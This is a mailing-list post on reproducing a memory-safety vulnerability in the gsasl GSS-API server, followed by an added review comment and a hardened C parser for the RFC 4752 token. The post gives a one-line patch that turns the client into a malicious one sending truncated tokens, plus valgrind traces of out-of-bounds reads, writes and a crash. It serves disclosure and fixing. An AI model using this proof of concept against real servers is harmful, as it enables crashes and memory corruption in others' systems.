Reproducing GSS-API server vulnerability

From: Simon Josefsson
Subject: Reproducing GSS-API server vulnerability
Date: Fri, 15 Jul 2022 20:27:49 +0200
User-agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)
If anyone is interested in reproducing the problem, it should be a matter
of the following (using vulnerable version 2.0.0 as an example):
./configure --with-gssapi-impl=mit
wget -O examples/smtp-server.c https://gitlab.com/gsasl/gsasl/-/raw/v2.0.1/examples/smtp-server.c
make
./libtool --mode=execute valgrind examples/smtp-server &
Setting up GSS-API including a KDC is the complicated part, but use
inspiration from CI/CD rules [1].
Then patch the GSS-API client code like this, to create a malicious
client:
--- gsasl-2.0.0.orig/lib/gssapi/client.c 2022-06-18 22:56:43.000000000
+0200
+++ gsasl-2.0.0/lib/gssapi/client.c 2022-07-15 20:18:07.623425188 +0200
@@ -225,6 +225,7 @@
memcpy (q + 4, p, strlen (p));
}
+ bufdesc.length = 0;
maj_stat = gss_wrap (&min_stat, state->context, 0, GSS_C_QOP_DEFAULT,
&bufdesc, &conf_state, &bufdesc2);
free (bufdesc.value);
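Review bot: the inserted `bufdesc.length = 0;` lands after the memcpy in the preceding block has already filled the buffer, so the bytes copied into bufdesc.value are discarded and gss_wrap() seals an empty message; that is the intent of the malicious client, but a one-line comment saying so (and noting that `free (bufdesc.value)` still releases the whole allocation because only the length field was changed) would make the test patch self-explanatory. Since the follow-up run uses `bufdesc.length = 3;`, consider taking the truncated length from an environment variable so both valgrind runs can be reproduced without re-editing client.c.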
Then invoke
make
src/gsasl -m GSSAPI smtp.gsasl.example 2000 --smtp
and you will get nice valgrind output like this:
==719087== Invalid read of size 1
==719087== at 0x485DE9D: _gsasl_gssapi_server_step (server.c:228)
==719087== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==719087== by 0x109880: server_auth (smtp-server.c:120)
==719087== by 0x109880: smtp (smtp-server.c:196)
==719087== by 0x109880: main (smtp-server.c:322)
==719087== Address 0x4cd4a20 is 0 bytes after a block of size 0 alloc'd
==719087== at 0x483877F: malloc (vg_replace_malloc.c:307)
==719087== by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==719087== by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==719087== by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==719087== by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==719087== by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==719087== by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==719087== by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==719087== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==719087== by 0x109880: server_auth (smtp-server.c:120)
==719087== by 0x109880: smtp (smtp-server.c:196)
==719087== by 0x109880: main (smtp-server.c:322)
Using 'bufdesc.length = 3;', you trigger more interesting output:
==715913== Invalid read of size 2
==715913== at 0x483CEE0: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913== by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913== Address 0x4cdcbe4 is 1 bytes after a block of size 3 alloc'd
==715913== at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913== by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==715913== by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==715913== by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==715913== by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==715913== by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==715913== by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==715913== by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913==
==715913== Invalid write of size 2
==715913== at 0x483CEE3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913== by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913== Address 0x4cdcc30 is 0 bytes after a block of size 0 alloc'd
==715913== at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913== by 0x484BD35: gsasl_property_set_raw (property.c:223)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913==
==715913== Invalid read of size 2
==715913== at 0x483CEEF: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913== by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913== Address 0x4cdcbe8 is 5 bytes after a block of size 3 alloc'd
==715913== at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913== by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==715913== by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==715913== by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==715913== by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==715913== by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==715913== by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==715913== by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
==715913==
==715913==
==715913== Process terminating with default action of signal 11 (SIGSEGV)
==715913== Bad permissions for mapped region at address 0x5054000
==715913== at 0x483CEE3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913== by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913== by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913== by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913== by 0x109880: server_auth (smtp-server.c:120)
==715913== by 0x109880: smtp (smtp-server.c:196)
==715913== by 0x109880: main (smtp-server.c:322)
Continuing downhill from here is left as an exercise for the reader...
/Simon
[1] https://gitlab.com/gsasl/gsasl/-/blob/v2.0.1/.gitlab-ci.yml#L413
Attachment: signature.asc (PGP signature)
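The two valgrind traces above pin the fault to the server reading the unwrapped client token before checking that it is long enough. RFC 4752 puts a 1-byte security-layer bitmask and a 3-byte maximum message size in front of the optional authorization identity; the first trace reads byte 0 of a 0-byte block at server.c:228, and the second has gsasl_property_set_raw copying from offset 4 of a 3-byte block (1 byte past its end) into a 0-byte allocation before walking off into unmapped memory. The following C model of that token parser is an added example, not gsasl's code and not part of Simon's message; the struct and function names are invented for illustration, and the `+ 1` for a terminating NUL in the allocation-size arithmetic is an assumption about the allocator pattern, chosen because it reproduces the "block of size 0" seen in the second trace. It shows the length check that rejects the 0- and 3-byte tokens the patched client produces.

```c
/* Model of the RFC 4752 GSSAPI final client token as seen by the server
 * after gss_unwrap().  Added example, not gsasl's code:
 *   byte 0      security layer bitmask
 *   bytes 1..3  maximum message size, big-endian
 *   bytes 4..   optional authorization identity (not NUL-terminated)
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct gss_final_token {
  uint8_t seclayer;
  uint32_t maxsize;
  char *authzid; /* malloc'd, NUL-terminated; NULL when absent */
};

/* Hardened parse: refuses anything shorter than the fixed 4-byte header.
 * Returns 0 on success and -1 on a malformed (too short) token. */
int parse_final_token(const unsigned char *buf, size_t len,
                      struct gss_final_token *out) {
  if (len < 4)
    return -1; /* the check whose absence the valgrind traces expose */
  out->seclayer = buf[0];
  out->maxsize = ((uint32_t)buf[1] << 16) | ((uint32_t)buf[2] << 8) | buf[3];
  size_t alen = len - 4; /* cannot underflow once len >= 4 is established */
  out->authzid = NULL;
  if (alen > 0) {
    out->authzid = malloc(alen + 1);
    if (out->authzid == NULL)
      return -1;
    memcpy(out->authzid, buf + 4, alen);
    out->authzid[alen] = '\0';
  }
  return 0;
}

/* What unchecked size_t arithmetic yields for a short token, computed without
 * touching any buffer: len == 3 gives (size_t)-1 + 1 == 0, i.e. malloc(0),
 * followed by a memcpy of SIZE_MAX bytes.  The "+ 1" is an assumed NUL slot. */
size_t unchecked_alloc_size(size_t len) {
  size_t alen = len - 4; /* wraps around for len < 4 */
  return alen + 1;
}

int main(void) {
  /* Constructed tokens: a well-formed one with authzid "user", and the two
   * truncated lengths (0 and 3) the patched client sends. */
  unsigned char tok[] = {0x01, 0x00, 0xff, 0xff, 'u', 's', 'e', 'r'};
  size_t lens[] = {sizeof tok, 4, 3, 0};
  for (size_t i = 0; i < 4; i++) {
    struct gss_final_token t;
    int rc = parse_final_token(tok, lens[i], &t);
    printf("len=%zu rc=%d", lens[i], rc);
    if (rc == 0) {
      printf(" seclayer=%u maxsize=%u authzid=%s", t.seclayer, t.maxsize,
             t.authzid ? t.authzid : "(none)");
      free(t.authzid);
    } else {
      printf(" unchecked_alloc_size=%zu", unchecked_alloc_size(lens[i]));
    }
    putchar('\n');
  }
  return 0;
}
```

Build with `cc -Wall -o token token.c` and run it under valgrind as the post does for smtp-server: the hardened parser produces no invalid reads for any of the four lengths, and the printed allocation size for `len=3` is 0, matching the zero-byte block in the second trace.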